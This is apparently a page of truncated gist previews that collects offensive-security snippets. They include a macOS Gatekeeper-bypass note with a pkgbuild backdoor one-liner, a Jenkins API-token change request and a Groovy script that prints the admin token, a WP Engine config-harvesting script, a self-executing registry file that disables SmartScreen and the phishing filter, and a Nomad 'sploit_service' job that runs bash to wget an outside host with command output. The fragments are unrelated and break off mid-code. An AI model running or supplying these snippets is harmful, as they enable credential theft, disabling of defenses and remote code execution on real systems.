carnal0wnage

Preparación para el OSCP (by s4vitar)

Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet

Índice y Estructura Principal

• Antecedentes - Experiencia Personal
• Buffer Overflow Windows (25 puntos)
  • Fuzzing

• Calculando el Offset (Tamaño del Búffer)

carnal0wnage

#Creating signed and customized backdoored macOS applications by abusing Apple Developer tools
https://medium.com/@adam.toscher/creating-signed-and-customized-backdoored-macos-applications-by-abusing-apple-developer-tools-b4cbf1a98187
Notes:
Include 1) 1Password 7.app (Gatekeeper Approved) 2) StuffIt Expander.app/Backdoor (Not Approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass)

Alternative one liner: 
$ pkgbuild --root /tmp/apps --identifier com.microsoft --install-location /Applications mypackage.pkg 

carnal0wnage

#!/usr/bin/env python3

import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES

MAGIC = b"::::MAGIC::::"

carnal0wnage

POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken  HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/

carnal0wnage

//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3

import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());        
User u = User.get("admin")  
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)  
def token = t.getApiToken()
//token.getClass()
println "token is $token "

carnal0wnage

#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!

TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)

# Pretty Colors
RESET='\033[00m'  
GREEN='\033[01;32m'

carnal0wnage

REGEDIT4
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]

carnal0wnage

job "sploit_service" {
	datacenters = ["dc1"]
	group "sploit" {
		task "shello" {
		driver = "raw_exec"

		config {
			command = "/bin/bash"
			args = ["-c", "wget http://10.0.0.8:8000/?foo=`which nc`"]
			}

carnal0wnage

# Increase log verbosity
log_level = "DEBUG"

# Setup data dir
data_dir = "/tmp/client2"

# Give the agent a unique name. Defaults to hostname
name = "client2"

# Enable the client

carnal0wnage

# Increase log verbosity
log_level = "DEBUG"

# Setup data dir
data_dir = "/tmp/client1"

# Give the agent a unique name. Defaults to hostname
name = "client1"

# Enable the client